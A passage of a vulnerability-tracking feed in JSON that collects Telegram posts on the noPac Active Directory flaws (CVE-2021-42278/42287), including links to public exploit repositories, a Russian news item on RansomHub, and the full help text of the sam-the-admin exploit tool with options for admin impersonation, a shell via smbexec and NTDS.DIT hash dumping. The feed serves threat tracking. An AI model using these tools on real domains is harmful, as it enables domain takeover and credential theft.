\u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443\n\nTHX:\n\nhttps://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html\n\nhttps://github.com/elastic/detection-rules/blob/a5359ca675267220afedf67795cd1fd04881b2c8/rules/windows/privilege_escalation_samaccountname_spoofing_attack.toml\n\nhttps://github.com/WazeHell/sam-the-admin", "creation_timestamp": "2023-03-16T10:15:44.000000Z"}, {"uuid": "dc763972-e8b6-4012-a2fd-083d2ae11605", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1040", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aPython implementation for CVE-2021-42278 (Active Directory Privilege Escalation)\nURL\uff1ahttps://github.com/ly4k/Pachine", "creation_timestamp": "2021-12-13T23:18:13.000000Z"}, {"uuid": "63963022-fb3b-49aa-907d-ac6abe49160f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "seen", "source": "https://t.me/secmedia/81", "content": "\u041a\u043e\u043c\u043f\u0430\u043d\u0438\u044f Microsoft \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0434\u0438\u043b\u0430 \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432 \u043e \u0434\u0432\u0443\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u0445 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 ( CVE-2021-42287 \u0438 CVE-2021-42278 ) \u0432 \u0441\u043b\u0443\u0436\u0431\u0435 \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u043e\u0432 Active Directory, \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043b\u0435\u0433\u043a\u043e \u043f\u0435\u0440\u0435\u0445\u0432\u0430\u0442\u044b\u0432\u0430\u0442\u044c \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c \u043d\u0430\u0434 \u0434\u043e\u043c\u0435\u043d\u0430\u043c\u0438 Windows.", "creation_timestamp": "2021-12-22T14:51:36.000000Z"}, {"uuid": "d1350c97-8665-4fc7-9945-fa3f7878f01d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "seen", "source": "https://t.me/itsec_news/5413", "content": "\u200b\u26a1\ufe0f600 \u0436\u0435\u0440\u0442\u0432 \u0437\u0430 \u0433\u043e\u0434: RansomHub \u2013 \u043d\u043e\u0432\u044b\u0439 \u043b\u0438\u0434\u0435\u0440 \u0432 \u0441\u0444\u0435\u0440\u0435 \u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u0438\u0445 \u0430\u0442\u0430\u043a\n\n\ud83d\udcac \u0412 2024 \u0433\u043e\u0434\u0443 \u043d\u0430 \u043a\u0438\u0431\u0435\u0440\u043f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u043e\u0439 \u0441\u0446\u0435\u043d\u0435 \u0441\u0442\u0440\u0435\u043c\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u043f\u043e\u044f\u0432\u0438\u043b\u0441\u044f \u043d\u043e\u0432\u044b\u0439 \u0438\u0433\u0440\u043e\u043a \u2014 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430 RansomHub, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0443\u0441\u043f\u0435\u043b\u0430 \u0430\u0442\u0430\u043a\u043e\u0432\u0430\u0442\u044c \u0443\u0436\u0435 \u0431\u043e\u043b\u0435\u0435 600 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0439 \u043f\u043e \u0432\u0441\u0435\u043c\u0443 \u043c\u0438\u0440\u0443. \u041f\u043e \u0434\u0430\u043d\u043d\u044b\u043c \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f Group-IB, \u0433\u0440\u0443\u043f\u043f\u0430 RansomHub \u0437\u0430\u043f\u043e\u043b\u043d\u0438\u043b\u0430 \u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u0443\u044e \u043d\u0438\u0448\u0443 \u043f\u043e\u0441\u043b\u0435 \u043d\u0435\u0434\u0430\u0432\u043d\u0438\u0445 \u043d\u0430\u0440\u0443\u0448\u0435\u043d\u0438\u0439 \u0432 \u0434\u0435\u044f\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u0438 ALPHV \u0438 LockBit .\n\n\u042d\u043a\u0441\u043f\u0435\u0440\u0442\u044b \u043e\u0442\u043c\u0435\u0447\u0430\u044e\u0442, \u0447\u0442\u043e RansomHub \u0434\u0435\u0439\u0441\u0442\u0432\u0443\u0435\u0442 \u0432 \u0444\u043e\u0440\u043c\u0430\u0442\u0435 ransomware-as-a-service (RaaS), \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u043f\u0440\u0438\u0432\u043b\u0435\u043a\u0430\u044f \u043f\u0430\u0440\u0442\u043d\u0451\u0440\u043e\u0432 \u043d\u0430 \u043f\u043e\u0434\u043f\u043e\u043b\u044c\u043d\u044b\u0445 \u0444\u043e\u0440\u0443\u043c\u0430\u0445, \u0442\u0430\u043a\u0438\u0445 \u043a\u0430\u043a RAMP. \u041e\u0441\u043d\u043e\u0432\u043d\u043e\u0439 \u0441\u0442\u0440\u0430\u0442\u0435\u0433\u0438\u0435\u0439 \u0441\u0442\u0430\u043b\u043e \u043f\u0435\u0440\u0435\u043c\u0430\u043d\u0438\u0432\u0430\u043d\u0438\u0435 \u0445\u0430\u043a\u0435\u0440\u043e\u0432 , \u0440\u0430\u043d\u0435\u0435 \u0440\u0430\u0431\u043e\u0442\u0430\u0432\u0448\u0438\u0445 \u043d\u0430 \u0434\u0440\u0443\u0433\u0438\u0435 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438, \u0447\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u043b\u043e RansomHub \u0431\u044b\u0441\u0442\u0440\u043e \u043d\u0430\u0440\u0430\u0441\u0442\u0438\u0442\u044c \u043c\u0430\u0441\u0448\u0442\u0430\u0431\u044b \u0430\u0442\u0430\u043a.\n\n\u0410\u043d\u0430\u043b\u0438\u0437 \u043a\u043e\u0434\u0430 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u0430 \u043f\u043e\u043a\u0430\u0437\u0430\u043b, \u0447\u0442\u043e \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430, \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e, \u043f\u0440\u0438\u043e\u0431\u0440\u0435\u043b\u0430 \u0441\u0432\u043e\u0451 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0435 \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u0435 \u0443 Knight (Cyclops), \u0434\u0440\u0443\u0433\u043e\u0439 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e\u0439 \u043a\u0438\u0431\u0435\u0440\u043f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u043e\u0439 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438. \u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0433\u043e\u0442\u043e\u0432\u044b\u0445 \u0440\u0435\u0448\u0435\u043d\u0438\u0439 \u0443\u0441\u043a\u043e\u0440\u0438\u043b\u043e \u0440\u0430\u0437\u0432\u0451\u0440\u0442\u044b\u0432\u0430\u043d\u0438\u0435 \u0430\u0442\u0430\u043a, \u0430 \u043c\u0443\u043b\u044c\u0442\u0438\u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u0435\u043d\u043d\u043e\u0441\u0442\u044c \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u044b \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u0442\u044c \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u043d\u0430 Windows, ESXi, Linux \u0438 FreeBSD, \u0440\u0430\u0441\u0448\u0438\u0440\u044f\u044f \u0441\u043f\u0438\u0441\u043e\u043a \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0445 \u0436\u0435\u0440\u0442\u0432.\n\nRansomHub \u043e\u0442\u043b\u0438\u0447\u0430\u0435\u0442\u0441\u044f \u0432\u044b\u0441\u043e\u043a\u043e\u0439 \u0441\u0442\u0435\u043f\u0435\u043d\u044c\u044e \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u043e\u0432\u0430\u043d\u043d\u043e\u0441\u0442\u0438. \u0413\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u043a\u0430\u043a \u043f\u0440\u043e\u0432\u0435\u0440\u0435\u043d\u043d\u044b\u0435 \u0442\u0435\u0445\u043d\u0438\u043a\u0438 \u0432\u0437\u043b\u043e\u043c\u0430 \u2014 \u0430\u0442\u0430\u043a\u0438 \u043d\u0430 VPN-\u0441\u0435\u0440\u0432\u0438\u0441\u044b \u0438 \u043f\u043e\u0434\u0431\u043e\u0440 \u043f\u0430\u0440\u043e\u043b\u0435\u0439, \u0442\u0430\u043a \u0438 \u0441\u043b\u043e\u0436\u043d\u044b\u0435 \u043c\u0435\u0442\u043e\u0434\u044b, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u043d\u0443\u043b\u0435\u0432\u043e\u0433\u043e \u0434\u043d\u044f. \u0412 \u0430\u0440\u0441\u0435\u043d\u0430\u043b\u0435 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0445 \u2014 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u044b \u0432\u0440\u043e\u0434\u0435 PCHunter, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0438\u0435 \u043e\u0431\u0445\u043e\u0434\u0438\u0442\u044c \u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0430 \u0437\u0430\u0449\u0438\u0442\u044b.\n\n\u0422\u0430\u043a\u0442\u0438\u043a\u0430 \u0430\u0442\u0430\u043a \u0432\u043a\u043b\u044e\u0447\u0430\u0435\u0442 \u0442\u0449\u0430\u0442\u0435\u043b\u044c\u043d\u043e\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0435 \u0441\u0435\u0442\u0438 \u0436\u0435\u0440\u0442\u0432\u044b \u0438 \u0437\u0430\u0445\u0432\u0430\u0442 \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0446\u0435\u043d\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445. \u041e\u043f\u0435\u0440\u0430\u0442\u043e\u0440\u044b \u043f\u0440\u043e\u043d\u0438\u043a\u0430\u044e\u0442 \u0432 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0443, \u043f\u043e\u043b\u0443\u0447\u0430\u044e\u0442 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c \u043d\u0430\u0434 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u043c\u0438 \u0443\u0437\u043b\u0430\u043c\u0438 \u2014 \u0444\u0430\u0439\u043b\u043e\u0432\u044b\u043c\u0438 \u0445\u0440\u0430\u043d\u0438\u043b\u0438\u0449\u0430\u043c\u0438, \u0440\u0435\u0437\u0435\u0440\u0432\u043d\u044b\u043c\u0438 \u043a\u043e\u043f\u0438\u044f\u043c\u0438, \u0441\u0435\u0440\u0432\u0435\u0440\u0430\u043c\u0438 \u2014 \u0438 \u043f\u0435\u0440\u0435\u043d\u043e\u0441\u044f\u0442 \u043a\u043e\u043d\u0444\u0438\u0434\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0435 \u0441\u0432\u0435\u0434\u0435\u043d\u0438\u044f \u043d\u0430 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u044b\u0435 \u0441\u0435\u0440\u0432\u0435\u0440\u044b. \u0414\u043b\u044f \u043f\u0435\u0440\u0435\u0434\u0430\u0447\u0438 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u043f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u0438\u043a\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 Filezilla, \u0430 \u0437\u0430\u0442\u0435\u043c \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u044e\u0442 \u043f\u0440\u043e\u0446\u0435\u0441\u0441 \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043d\u0430 \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0445\u043e\u0441\u0442\u0430\u0445.\n\n\u041f\u043e\u0441\u043b\u0435 \u0437\u0430\u0432\u0435\u0440\u0448\u0435\u043d\u0438\u044f \u0430\u0442\u0430\u043a\u0438 RansomHub \u0448\u0430\u043d\u0442\u0430\u0436\u0438\u0440\u0443\u0435\u0442 \u0436\u0435\u0440\u0442\u0432\u0443, \u0442\u0440\u0435\u0431\u0443\u044f \u0432\u044b\u043a\u0443\u043f \u0437\u0430 \u0440\u0430\u0441\u0448\u0438\u0444\u0440\u043e\u0432\u043a\u0443 \u0438 \u043d\u0435\u043f\u0443\u0431\u043b\u0438\u043a\u0430\u0446\u0438\u044e \u0434\u0430\u043d\u043d\u044b\u0445. \u041f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0430-\u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044c \u0441\u043f\u043e\u0441\u043e\u0431\u043d\u0430 \u043e\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0442\u044c \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u044c\u043d\u044b\u0435 \u043c\u0430\u0448\u0438\u043d\u044b, \u0443\u043d\u0438\u0447\u0442\u043e\u0436\u0430\u0442\u044c \u0442\u0435\u043d\u0435\u0432\u044b\u0435 \u043a\u043e\u043f\u0438\u0438 \u0444\u0430\u0439\u043b\u043e\u0432 \u0438 \u0437\u0430\u0447\u0438\u0449\u0430\u0442\u044c \u0436\u0443\u0440\u043d\u0430\u043b\u044b \u0441\u043e\u0431\u044b\u0442\u0438\u0439, \u0437\u0430\u0442\u0440\u0443\u0434\u043d\u044f\u044f \u0440\u0430\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0435 \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442\u0430 .\n\n\u041e\u0434\u043d\u043e\u0439 \u0438\u0437 \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0440\u0430\u0437\u0440\u0443\u0448\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u0430\u0442\u0430\u043a RansomHub \u0441\u0442\u0430\u043b\u0430 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u044f, \u043f\u0440\u043e\u0432\u0435\u0434\u0451\u043d\u043d\u0430\u044f \u0432\u0441\u0435\u0433\u043e \u0437\u0430 14 \u0447\u0430\u0441\u043e\u0432. \u041f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u0438\u043a\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u043c\u0435\u0436\u0441\u0435\u0442\u0435\u0432\u043e\u043c \u044d\u043a\u0440\u0430\u043d\u0435 Palo Alto ( CVE-2024-3400 ) \u0434\u043b\u044f \u043f\u0435\u0440\u0432\u0438\u0447\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430, \u0437\u0430\u0442\u0435\u043c \u043f\u0440\u0438\u043c\u0435\u043d\u0438\u043b\u0438 \u0431\u0440\u0443\u0442\u0444\u043e\u0440\u0441 \u0443\u0447\u0451\u0442\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 \u043e\u0442 VPN-\u043a\u043b\u0438\u0435\u043d\u0442\u0430. \u041f\u043e\u0441\u043b\u0435 \u044d\u0442\u043e\u0433\u043e \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u043b\u0438 \u0441\u0442\u0430\u0440\u044b\u0435 \u0431\u0440\u0435\u0448\u0438 \u0432 Windows ( CVE-2021-42278 \u0438 CVE-2020-1472 ), \u043f\u043e\u043b\u0443\u0447\u0430\u044f \u043f\u043e\u043b\u043d\u044b\u0439 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c \u043d\u0430\u0434 \u0441\u0435\u0442\u044c\u044e.\n\n\u042d\u043a\u0441\u043f\u0435\u0440\u0442\u044b \u043f\u043e\u0434\u0447\u0451\u0440\u043a\u0438\u0432\u0430\u044e\u0442, \u0447\u0442\u043e \u0441\u0442\u043e\u043b\u044c \u044d\u0444\u0444\u0435\u043a\u0442\u0438\u0432\u043d\u0430\u044f \u0434\u0435\u044f\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u044c RansomHub \u0441\u0442\u0430\u043b\u0430 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0439 \u0438\u0437-\u0437\u0430 \u043d\u0435\u0441\u0432\u043e\u0435\u0432\u0440\u0435\u043c\u0435\u043d\u043d\u043e\u0433\u043e \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c. \u0415\u0441\u043b\u0438 \u0442\u0430 \u0438\u043b\u0438 \u0438\u043d\u0430\u044f \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f \u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u0441\u044f \u0436\u0435\u0440\u0442\u0432\u043e\u0439 \u0430\u0442\u0430\u043a\u0438 \u0447\u0435\u0440\u0435\u0437 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u0437\u0430\u043a\u0440\u044b\u0442\u0443\u044e \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u043b\u0435\u0442 \u043d\u0430\u0437\u0430\u0434, \u0442\u043e \u0432\u0438\u043d\u043e\u0432\u0430\u0442\u043e \u0432 \u044d\u0442\u043e\u043c \u0438\u0441\u043a\u043b\u044e\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0435\u0451 \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0435 \u0445\u0430\u043b\u0430\u0442\u043d\u043e\u0435 \u043e\u0442\u043d\u043e\u0448\u0435\u043d\u0438\u0435 \u043a \u043a\u0438\u0431\u0435\u0440\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438. \u0412 \u0434\u0430\u043d\u043d\u043e\u043c \u0441\u043b\u0443\u0447\u0430\u0435 \u0433\u043b\u0443\u043f\u043e \u043f\u0435\u0440\u0435\u043a\u043b\u0430\u0434\u044b\u0432\u0430\u0442\u044c \u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0441\u0442\u044c \u043d\u0430 \u043f\u043e\u0441\u0442\u0430\u0432\u0449\u0438\u043a\u043e\u0432 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f.\n\n\u0420\u0430\u0441\u0442\u0443\u0449\u0430\u044f \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u044c RansomHub \u0441\u0432\u0438\u0434\u0435\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0443\u0435\u0442 \u043e \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u044e\u0449\u0435\u0439\u0441\u044f \u044d\u0432\u043e\u043b\u044e\u0446\u0438\u0438 \u043a\u0438\u0431\u0435\u0440\u0443\u0433\u0440\u043e\u0437. \u041e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438 \u0434\u043e\u043b\u0436\u043d\u044b \u0443\u0441\u0438\u043b\u0438\u0432\u0430\u0442\u044c \u0441\u0432\u043e\u044e \u0437\u0430\u0449\u0438\u0442\u0443, \u0440\u0435\u0433\u0443\u043b\u044f\u0440\u043d\u043e \u043e\u0431\u043d\u043e\u0432\u043b\u044f\u0442\u044c \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0435 \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u0435 \u0438 \u043c\u0438\u043d\u0438\u043c\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u043f\u043e\u0432\u0435\u0440\u0445\u043d\u043e\u0441\u0442\u044c \u0430\u0442\u0430\u043a\u0438, \u0447\u0442\u043e\u0431\u044b \u043d\u0435 \u043f\u043e\u043f\u0430\u0441\u0442\u044c \u0432 \u0441\u043f\u0438\u0441\u043e\u043a \u0436\u0435\u0440\u0442\u0432 RansomHub \u0438 \u043f\u0440\u043e\u0447\u0438\u0445 \u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u0438\u0445 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043e\u043a.\n\n\ud83d\udd14 ITsec NEWS", "creation_timestamp": "2025-02-17T08:21:47.000000Z"}, {"uuid": "17abb29c-6f99-4c01-a06c-9708d84e788d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/ETHICALHACKERSCOMMUNITY2/1110", "content": "Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user  Changed from sam-the-admin (https://github.com/WazeHell/sam-the-admin).\n  Usage  SAM THE ADMIN CVE-2021-42278 + CVE-2021-42287 chain\n\npositional arguments:\n  [domain/]username[:password]\n                        Account used to authenticate to DC.\n\noptional arguments:\n  -h, --help            show this help message and exit\n  --impersonate IMPERSONATE\n                        target username that will be impersonated (thru S4U2Self) for quering the ST. Keep in mind this will only work if the identity provided in this scripts is allowed for delegation to the SPN specified\n  -domain-netbios NETBIOSNAME\n                        Domain NetBIOS name. Required if the DC has multiple domains.\n  -target-name NEWNAME  Target computer name, if not specified, will be random generated.\n  -new-pass PASSWORD    Add new computer password, if not specified, will be random generated.\n  -old-pass PASSWORD    Target computer password, use if you know the password of the target you input with -target-name.\n  -ol   d-hash LMHASH:NTHASH\n                        Target computer hashes, use if you know the hash of the target you input with -target-name.\n  -debug                Turn DEBUG output ON\n  -ts                   Adds timestamp to every logging output\n  -shell                Drop a shell via smbexec\n  -no-add               Forcibly change the password of the target computer.\n  -create-child         Current account have permission to CreateChild.\n  -dump                 Dump Hashs via secretsdump\n  -use-ldap             Use LDAP instead of LDAPS\n\nauthentication:\n  -hashes LMHASH:NTHASH\n                        NTLM hashes, format is LMHASH:NTHASH\n  -no-pass              don't ask for password (useful for -k)\n  -k                    Use Kerberos (https://www.kitploit.com/search/label/Kerberos) authentication. Grabs credentials (https://www.kitploit.com/search/label/Credentials) from ccache file (KRB5CCNAME) based on account parameters. If valid credentials cannot be found, it will use the ones specified in the command line\n  -aesKey hex key       AES key to use for Kerberos Authentication (https://www.kitploit.com/search/label/Authentication) (128 or 256 bits)\n  -dc-host hostname     Hostname of the domain controller (https://www.kitploit.com/search/label/Domain%20Controller) to use. If ommited, the domain part (FQDN) specified in the account parameter will be used\n  -dc-ip ip             IP of the domain controller to use. Useful if you can't translate the FQDN.specified in the account parameter will be used\n\nexecute options:\n  -port [destination port]\n                        Destination port to connect to SMB Server\n  -mode {SERVER,SHARE}  mode to use (default SHARE, SERVER needs root!)<   br/>  -share SHARE          share where the output will be grabbed from (default ADMIN$)\n  -shell-type {cmd,powershell}\n                        choose a command processor for the semi-interactive shell\n  -codec CODEC          Sets encoding (https://www.kitploit.com/search/label/Encoding) used (codec) from the target's output (default \"GBK\").\n  -service-name service_name\n                        The name of theservice used to trigger the payload\n\ndump options:\n  -just-dc-user USERNAME\n                        Extract only NTDS.DIT data for the user specified. Only available for DRSUAPI approach. Implies also -just-dc switch\n  -just-dc              Extract only NTDS.DIT data (NTLM hashes and Kerberos keys)\n  -just-dc-ntlm         Extract only NTDS.DIT data (NTLM hashes only)\n  -pwd-last-set         Shows pwdLastSet attribute for each NTDS.DIT account. Doesn't apply to -outputfile data\n  -use   r-status          Display whether or not the user is disabled\n  -history              Dump password history, and LSA secrets OldVal\n  -resumefile RESUMEFILE", "creation_timestamp": "2022-09-06T14:17:32.000000Z"}, {"uuid": "4ef15f42-f61a-4320-9e0e-da9d28a10d34", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/ETHICALHACKERSCOMMUNITY2/1108", "content": "noPac - Exploiting CVE-2021-42278 And CVE-2021-42287 To Impersonate DA From Standard Domain User\nhttp://www.kitploit.com/2022/09/nopac-exploiting-cve-2021-42278-and-cve.html", "creation_timestamp": "2022-09-06T14:17:31.000000Z"}, {"uuid": "8cee49e5-cf58-4e39-bc5c-036ed02ebfda", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/poxek/270", "content": "CVE-2021-42287 / CVE-2021-42278: impersonate DA from standard domain user\n\nScanner and exploit in C # :\nhttps://github.com/cube0x0/noPac\n\nPython exploit for kali : https://github.com/WazeHell/sam-the-admin\n\n@dnevnik_infosec", "creation_timestamp": "2021-12-18T15:24:11.000000Z"}, {"uuid": "cec70a97-66ce-48db-82ee-e71b83a5e589", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/poxek/1578", "content": "NoPacScan\n\u042d\u0442\u043e \u0441\u043a\u0430\u043d\u0435\u0440 CVE-2021-42287/CVE-2021-42278, \u043e\u043d \u0441\u043a\u0430\u043d\u0438\u0440\u0443\u0435\u0442 \u0431\u043e\u043b\u044c\u0448\u0435 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u043e\u0432 \u0434\u043e\u043c\u0435\u043d\u0430, \u0447\u0435\u043c \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b\u044c\u043d\u044b\u0439 \u0441\u043a\u0440\u0438\u043f\u0442, \u0438 \u0431\u043e\u043b\u0435\u0435 \u0442\u043e\u0447\u0435\u043d, \u0447\u0435\u043c \u043e\u043d. \u041e\u043d \u0441\u043a\u0430\u043d\u0438\u0440\u0443\u0435\u0442 DC \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e DNS \u043f\u043e\u0438\u0441\u043a\u0430 _msdcs.aaa.com, \u044d\u0442\u043e \u043b\u0443\u0447\u0448\u0435, \u0447\u0435\u043c LDAP \u0438 SAMR, \u0438 \u043e\u043d \u0431\u0443\u0434\u0435\u0442 \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0432\u0441\u0435 DC, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043c\u044b \u043d\u0430\u0445\u043e\u0434\u0438\u043c. \u0415\u0441\u043b\u0438 \u0432\u044b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0435 LDAP \u0438\u043b\u0438 SAMR, \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e, \u0432\u044b 